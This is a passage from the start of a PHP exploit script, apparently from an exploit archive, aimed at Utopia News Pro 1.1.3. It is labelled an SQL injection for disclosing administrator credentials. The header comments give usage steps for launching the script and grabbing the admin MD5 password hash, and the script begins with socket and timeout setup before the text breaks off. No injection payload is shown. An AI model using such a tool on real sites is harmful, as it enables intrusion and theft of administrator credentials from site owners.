SQL INJECTION: /str0ke # # 3.10 07/10/2005 # # utopia_xpl.php # # # # Utopia News Pro 1.1.3 (possibly prior versions) SQL Injection / # # Administrative credentials disclosure # # by rgod # # site: http://rgod.altervista.org # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # ... grab admin MD5 passowrd hash right now # # # # Sun-Tzu: "All warfare is based on deception" # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'
Utopia News Pro 1.1.3 SQL Injection
a script by rgod at http://rgod.altervista.org